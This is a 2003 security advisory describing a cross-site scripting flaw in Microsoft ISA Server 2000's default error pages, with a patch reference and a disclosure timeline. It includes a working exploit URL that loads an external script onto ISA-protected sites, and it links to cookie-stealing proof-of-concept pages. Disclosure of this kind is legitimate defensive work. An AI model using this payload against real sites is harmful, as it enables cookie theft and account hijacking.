Thor Larholm security advisory TL#006
-------------------------------------

16 July 2003

HTML format: http://pivx.com/larholm/adv/TL006

Topic: ISA Server HTTP error handler XSS.

Discovery date: 25 June 2002.

Severity: Medium

Affected applications:
----------------------

Any Microsoft Internet Security and Acceleration (ISA) Server installation
that hosts the default HTTP error pages. This includes:

ISA Server 2000

Impact:
-------

Stealing cookies from any ISA-protected site, cross-site scripting to any
ISA-protected site, hijacking Hotmail and Passport accounts, elevating
priveleges through ActiveX components, hijacking the MSN Messenger client,
etc.

Introduction:
-------------

CrossSiteScripting is a term that describes the injection of script code on
foreign sites. A very likely scenario is where a malicious programmer would
inject code on e.g. hotmail.com to steal a victims cookies, allowing him/her
to hijack the victims email account.
The default installation of ISA Server is suspectible to such a XSS error.

Discussion:
-----------

Every time ISA Server encounters a HTTP errorcode such as 404 Not Found or
500 Internal Server Error, ISA Server returns a HTTP error handler document
which is an HTML file.
These HTML files use scripting to output a link to the SERVER.TLD part of
the URL, and by crafting a specially formed URL it is possible to include
arbitrary script commands on the HTTP error handler document, thereby
enabling CrossSiteScripting on any ISA-protected site.

Unlike TL001 we will prefer to trigger a 500 Internal Server error instead
of a 404 Not Found error, as the HTTP 500 error handler document can easily
be lured out of ISA Server by appending %U0 to the querystring, resulting in
an unparsable request.
Many other requests can result in ISA Server handing out an HTTP error
handler document.

If we look at 404.htm or 500.htm we will notice a particular line of code:

document.write( '<A HREF="' + escape(urlresult) + '">' + displayresult +
"</a>");

displayResult is derived from the first instance of :// in the URL until the
next instance of /.
This means that we will have to include our script code before the path part
of the URL. To accomplish this we include our script code in the Basic
Authentication part of the URL, but we first have to escape any special
characters in the code. Any / character will end displayresult prematurely
and any spaces will corrupt the DNS lookup, and we therefor replace any
space with a TAB (%09) and any / with %5Cx2f (\x2f, as we will dynamically
reference an external file).

Exploit:
--------


http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%
5Cx2f
jscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0

The above will include and execute http://jscript.dk/test.js on YOUR.TLD,
provided that YOUR.TLD is protected by an ISA Server installation.

Solution:
---------

Apply the MS03-028 patch.
You could also use the opportunity to make yourself some nice custom error
handler documents.

History:
--------

25 June 2003: Discovery
27 June 2003: Notification to MS with complete advisory
28 June 2003: Reply from MS:

This has actually been reported to us by another finder a few weeks ago.
We're nearing a release of a bulletin crediting the finder and a patch.

16 July 2003: MS03-028 patch released by MS, no credit for discovery
16 July 2003: Public advisory

Demonstration:
--------------

I have put together some proof-of-concept examples:

Simple static examples - your cookies from a selection of domains:
http://pivx.com/larholm/adv/TL006/simple.html

Short advanced example - get the cookies from any ISA-protected site:
http://pivx.com/larholm/adv/TL006/advanced.html


References:
-----------

MS03-028 patch
http://www.microsoft.com/technet/security/bulletin/MS03-028.asp
TL001 IIS allows universal CrossSite Scripting:
- http://www.pivx.com/larholm/adv/TL001/
CERT Cross Site Scripting advisory:
- http://www.cert.org/advisories/CA-2000-02.html
Unpatched IE vulnerabilities:
- http://pivx.com/larholm/unpatched/




Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher